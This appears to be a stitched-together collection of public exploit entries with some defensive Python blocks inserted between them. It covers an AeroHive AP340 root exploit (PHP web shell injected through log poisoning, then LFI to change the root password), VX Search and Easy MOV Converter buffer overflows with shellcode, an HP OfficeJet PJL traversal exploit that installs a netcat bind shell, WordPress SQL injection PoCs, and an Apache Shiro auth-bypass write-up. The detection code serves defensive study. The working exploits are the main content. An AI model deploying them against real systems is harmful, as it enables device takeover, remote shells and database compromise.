# Note: if you mess up and get invalid syntax errors, just reboot the AP; it
# will erase/rotate the logs
payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){ $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"</pre>$cmd<pre>\"; die; } ?>"
# URL of the login page where we will inject our PHP command exec code so it poisons the log file
post_url= "/login.php5?version=6.1r2"
post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
post_fields = urllib.parse.urlencode(post_fields)
data = post_fields.encode('ascii')
# Payload to call the injected PHP code
payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="
# Payload to change the root SSH user password
payload_command = "echo+root:password+|+/usr/sbin/chpasswd"
# Combined payload to change password using LFI
payload_chpasswd = payload_lfi_url+payload_command
print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")
# Get target URL from user
print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
wap_ip = input(">>> ")
base_url = "http://" + wap_ip
# Poison log file with POST to login page
# json_data = json.dumps(post_fields).encode("utf8")
# request = urllib.request.Request(base_url+post_url, post_fields)
print ("Poisoning log file at /var/log/messages. . .")
request = urllib.request.Request(base_url+post_url, data)
json = urlopen(request).read().decode()
# Change the command with LFI->command execution
print("Interacting with PHP shell to change root password. . .")
content = urllib.request.urlopen(base_url+payload_chpasswd).read()
if "Password for " in content.decode('ascii'):
print("Success!")
print("Now try to log in with root:password via SSH!")
else:
print("Exploit Failed")
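The exploit above chains two weaknesses a defender can look for independently: PHP code landing in /var/log/messages through the login form, and an include path built from the `_page` parameter with `../` and a `%00` terminator. The following Python 3 block is an added example, not code from the exploit or from AeroHive: it runs two simple inspectors over constructed access-log and syslog lines, and shows the hardening side (an allowlist lookup instead of an include path assembled from user input). The log lines, field names and the `resolve_page` helper are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined log format: the quoted request holds method, URL and protocol.
ACCESS_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
PHP_OPEN_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)


def inspect_access_line(line):
    """Return the LFI indicators found in one access-log line ([] if none)."""
    m = ACCESS_LINE.match(line)
    if m is None:
        return []
    decoded = unquote(m.group('url'))  # one level of percent-decoding: %00 becomes NUL
    found = []
    if '\x00' in decoded:
        found.append('null-byte')  # suffix truncation of an include path
    if '../' in decoded or '..\\' in decoded:
        found.append('traversal')
    if '/var/log/' in decoded or '/proc/self/' in decoded:
        found.append('log-or-proc-include')
    return found


def inspect_syslog_line(line):
    """Flag log entries that carry a PHP open tag (log poisoning)."""
    return ['php-tag-in-log'] if PHP_OPEN_TAG.search(line) else []


def scan(access_lines, syslog_lines):
    """Run both inspectors; return {(source, index): indicators} for lines that hit."""
    hits = {}
    for i, line in enumerate(access_lines):
        found = inspect_access_line(line)
        if found:
            hits[('access', i)] = found
    for i, line in enumerate(syslog_lines):
        found = inspect_syslog_line(line)
        if found:
            hits[('syslog', i)] = found
    return hits


# Hardening: map the page name through an allowlist instead of joining it into a path.
ALLOWED_PAGES = {'status', 'summary'}


def resolve_page(page):
    if page not in ALLOWED_PAGES:
        raise ValueError('unknown page')
    return f'/var/www/pages/{page}.php5'


# Constructed sample input (not real device logs).
SAMPLE_ACCESS = [
    '198.51.100.7 - - [15/Jun/2017:09:12:01 +0000] "GET /action.php5?_action=get&_actionType=1&_page=status HTTP/1.1" 200 1342',
    '198.51.100.7 - - [15/Jun/2017:09:12:09 +0000] "GET /action.php5?_action=get&_actionType=1&_page=../../../../../../var/log/messages%00 HTTP/1.1" 200 8810',
]
SAMPLE_SYSLOG = [
    "Jun 15 09:11:58 ap340 login: authentication failed for user 'admin' from 198.51.100.7",
    "Jun 15 09:12:05 ap340 login: authentication failed for user '<?php echo 1; ?>' from 198.51.100.7",
]

if __name__ == '__main__':
    for key, found in sorted(scan(SAMPLE_ACCESS, SAMPLE_SYSLOG).items()):
        print(key, found)
```

The access-log inspector decodes once before matching, so an encoded `%2e%2e%2f` is caught as well as a literal `../`; the syslog inspector is the one that catches the poisoning step before the include ever happens.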
import os
import struct
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
# Date: 2017.06.15
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
overflow = "A" * 1536
jmp_esp = "\x4E\x21\x1F\x65"
#"\x94\x21\x1C\x65"
shortjump = "\xEB\x55"
shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
"\xae\xc2\x28\x4b\x32\x05")
crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()
print "Magic.xml ready!"
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##
import socket
import sys
from easysnmp import snmp_set
profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
'\tmkfifo /tmp/pwned\n'
'\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n'
'fi\n')
if len(sys.argv) != 3:
print '\nUsage:upload.py [ip] [port]\n'
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)
response = ''
while True:
data = sock1.recv(1)
if '\n' == data: break
response += data
print response
snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
print 'Done! Try port 1270 in ~30 seconds'
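The script above relies on a PJL FSDOWNLOAD whose NAME climbs out of the volume root with `../`, and on the SIZE field delimiting the file content that follows the command line. The Python 3 block below is an added example, not part of the exploit or of HP's firmware: an auditor for captured raw-print (TCP/9100) traffic that parses PJL file-system commands, skips over FSDOWNLOAD payloads so content containing "@PJL" cannot confuse it, and flags any NAME that escapes its volume. The sample stream, the helper names and the payload text are constructed for illustration.

```python
import re

UEL = '\x1b%-12345X'  # Universal Exit Language sequence that brackets PJL jobs
FS_CMD_RE = re.compile(
    r'^@PJL\s+(FSDOWNLOAD|FSAPPEND|FSUPLOAD|FSQUERY|FSDELETE|FSMKDIR|FSDIRLIST)\b(.*)$',
    re.IGNORECASE,
)
NAME_RE = re.compile(r'NAME\s*=\s*"([^"]*)"', re.IGNORECASE)
SIZE_RE = re.compile(r'SIZE\s*=\s*(\d+)', re.IGNORECASE)
WRITE_CMDS = {'FSDOWNLOAD', 'FSAPPEND', 'FSDELETE', 'FSMKDIR'}


def escapes_volume(name):
    """True if a PJL path such as "0:/a/../../b" climbs above the root of its volume."""
    path = name.split(':', 1)[1] if ':' in name else name
    depth = 0
    for seg in path.replace('\\', '/').split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def audit_pjl_stream(stream):
    """Walk a captured job and describe every file-system command it contains."""
    findings = []
    pos = 0
    while pos < len(stream):
        nl = stream.find('\n', pos)
        end = len(stream) if nl == -1 else nl + 1
        line = stream[pos:end].replace(UEL, '').rstrip('\r\n')
        pos = end
        m = FS_CMD_RE.match(line)
        if not m:
            continue
        cmd, rest = m.group(1).upper(), m.group(2)
        name_m = NAME_RE.search(rest)
        size_m = SIZE_RE.search(rest)
        if cmd in ('FSDOWNLOAD', 'FSAPPEND') and size_m:
            # The next SIZE bytes are file content, not commands: skip them so a
            # payload containing "@PJL" lines is not parsed as further commands.
            pos += int(size_m.group(1))
        name = name_m.group(1) if name_m else ''
        findings.append({
            'cmd': cmd,
            'name': name,
            'write': cmd in WRITE_CMDS,
            'escape': escapes_volume(name),
        })
    return findings


def suspicious_commands(stream):
    """Only the commands whose target path leaves its volume."""
    return [f for f in audit_pjl_stream(stream) if f['escape']]


# Constructed sample job (not a real capture): one traversal write, one benign query.
SAMPLE_PAYLOAD = 'echo constructed sample\n'
SAMPLE_STREAM = (
    UEL
    + '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=%d NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n' % len(SAMPLE_PAYLOAD)
    + SAMPLE_PAYLOAD
    + UEL
    + '@PJL FSQUERY NAME="0:/webServer/home/device.html"\r\n'
)

if __name__ == '__main__':
    for f in audit_pjl_stream(SAMPLE_STREAM):
        print(f)
```

Run it against traffic mirrored from the print VLAN; any finding with `escape` set is worth an alert. The structural fix is the vendor firmware update, and in the meantime TCP/9100 should not be reachable from untrusted networks at all.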
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps
1. Description:
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps
1. Description:
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
3. Solution:
A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.
4. Reference:
http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
0x00 Vulnerability description
Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management. The earlier patch for the Apache Shiro authentication bypass vulnerability CVE-2020-11989 was flawed. In 1.5.3 and earlier, Shiro still handles URLs differently from Spring, so an authentication bypass vulnerability remains. Because of an error in how authentication requests are processed, a remote attacker can send a specially crafted HTTP request, bypass the authentication process and gain unauthorized access to the application.
0x01 Affected versions
Apache Shiro < 1.6.0
0x02 Environment setup
1. Download the project https://github.com/l3yx/springboot-shiro to the local machine.
2. In pom.xml replace 1.5.2 with 1.5.3, and in the LoginController under src/main/java/org/syclover/srpingbootshiro replace the backend check on /admin/page with /admin/{name}.
3. Rebuild and run in the IDEA editor. Put the compiled war package into Tomcat's webapps directory and run it. https://github.com/backlion/demo/blob/master/srpingboot-shiro-0.1-snapshot.war
0x03 Code description
1. ShiroConfig.java (springboot-shiro-master\src\main\java\org\syclover\srpingbootshiro\ShiroConfig.java), permission settings: when the /admin/* resource is requested, a 302 redirects to the login page for identity authentication. The /admin/{name} route is what triggers identity authentication.
0x04 Vulnerability reproduction
1. When no resource name is specified in the request route, authentication is not triggered and no resource is returned: http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/admin
2. When a resource name is specified in the request route, a 302 redirects to the authentication page: http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/login
3. When a specific PoC request is constructed, the specified resource is requested without triggering authentication, and authorization is bypassed (bypass with %3B): http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/admin/
0x05 Vulnerability analysis
We can see that the problem lies in org.apache.shiro.web.util.WebUtils. Put a breakpoint here and debug. This code was updated to obtain the URL with getServletPath and getPathInfo. However, the real vulnerability point is not here.
We can see that the URL after concatenation is fine.
After the semicolon processing has removed its part, we can see that only /admin/* is kept. We can add an /admin* route to the controller for testing:
@GetMapping("/admin*")
public String admin2() {
    return "please log in, admin";
}
http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/admin/*
No permission to access. Of course, if parameters are added afterwards, access permission is required.
Follow up into removeSemicolon.
Likewise, it strips the ';' and the content after it.
Let's look at how Spring handles it.
Spring has no problem.
Let's look at how the URL is handled:
org.springframework.web.util.UrlPathHelper#decodeAndCleanUriString
removeSemicolonContent # removes ';' and the part after it
decodeRequestString # URL-decodes
getSanitizedPath # replaces //
Shiro does the opposite: the URL decoding is performed first, and the removal happens afterwards. Vulnerability debugging locations:
shiro-web-1.5.3.jar // org.apache.shiro.web.util.WebUtils.java
// line 111
public static String getPathWithinApplication(HttpServletRequest request) {
    return normalize(removeSemicolon(getServletPath(request) + getPathInfo(request)));
}
spring-web-5.2.5.RELEASE.jar // org.springframework.web.util.UrlPathHelper.java
// line 459
private String decodeAndCleanUriString(HttpServletRequest request, String uri) {
    uri = removeSemicolonContent(uri);
    uri = decodeRequestString(request, uri);
    uri = getSanitizedPath(uri);
    return uri;
}
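The two pipelines above differ only in the order of decoding and semicolon removal, and that is the whole bug: the path the access-control layer matches is not the path the routing layer dispatches. The Python 3 block below is an added example, not Shiro's or Spring's code: it models the two orders the write-up names on the same raw URI, shows where they disagree (using `%3B`, as mentioned in the reproduction section), and adds a defence-in-depth check that refuses any request the two layers would interpret differently. The model of what the servlet container hands to getServletPath/getPathInfo (literal path parameters stripped, then percent-decoded), the simplified `normalize`, and the function names are assumptions made for the example.

```python
from urllib.parse import unquote


def remove_semicolon_content(uri):
    """Spring-style: in every segment drop ';' and what follows it up to the next '/'."""
    out = []
    i = 0
    while i < len(uri):
        if uri[i] == ';':
            nxt = uri.find('/', i)
            if nxt == -1:
                break
            i = nxt
        else:
            out.append(uri[i])
            i += 1
    return ''.join(out)


def collapse_slashes(path):
    while '//' in path:
        path = path.replace('//', '/')
    return path


def normalize_dots(path):
    """Resolve '.' and '..' segments, keeping a trailing slash (rough model of Shiro's normalize)."""
    trailing = path.endswith('/')
    parts = []
    for seg in path.split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if parts:
                parts.pop()
        else:
            parts.append(seg)
    result = '/' + '/'.join(parts)
    if trailing and result != '/':
        result += '/'
    return result


def spring_view(raw_uri):
    """Order given for UrlPathHelper#decodeAndCleanUriString: strip ';...', decode, sanitize."""
    p = remove_semicolon_content(raw_uri)
    p = unquote(p)
    return collapse_slashes(p)


def container_path(raw_uri):
    """Assumed container behaviour: literal path parameters stripped, then percent-decoded."""
    return unquote(remove_semicolon_content(raw_uri))


def shiro_view(raw_uri):
    """Order given for WebUtils#getPathWithinApplication: already-decoded path, cut at ';', normalize."""
    p = container_path(raw_uri).split(';', 1)[0]
    return normalize_dots(collapse_slashes(p))


def views_agree(raw_uri):
    return spring_view(raw_uri) == shiro_view(raw_uri)


def guard(raw_uri):
    """Front-door check: reject a request when the two layers would not see the same path."""
    if not views_agree(raw_uri):
        return 400, 'ambiguous path'
    return 200, shiro_view(raw_uri)


if __name__ == '__main__':
    # Constructed inputs: a plain request, one carrying a jsessionid, one with an encoded ';'.
    for uri in ('/admin/page', '/admin;jsessionid=abc/page', '/admin/%3bpage'):
        print(uri, '->', spring_view(uri), '|', shiro_view(uri), '|', guard(uri))
```

The guard is only a compensating control for the pattern of mismatched normalization; the fix remains the upgrade the next section gives. The same check is useful in any stack where a filter and a router normalize paths separately.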
0x06 Vulnerability fix
An official fixed version has been released; update to Apache Shiro 1.6.0.
0x07 References
https://github.com/lyy289065406/cve-2020-13933
https://www.cnblogs.com/ph4nt0mer/p/135359999.html
https://xz.aliyun.com/t/8223
#!/usr/bin/python
###############################################################################
# Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 13-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Easy MOV Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/easy_mov_converter.exe
# Tested On: Windows 7 SP1 32bit
#
# Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################
# If you're using WinXP SP3, change this to 996
buffer = "\x41" * 1008
nSEH = "\xeb\x10\x90\x90"
# 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:\Program Files\Easy MOV Converter\SkinMagic.dll)
SEH = "\x5c\x14\x01\x10"
badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
junk = "\x90" * 16
badchars = "\x0a\x0d"
data = buffer + nSEH + SEH + junk + buf
f = open ("exploit.txt", "w")
f.write(data)
f.close()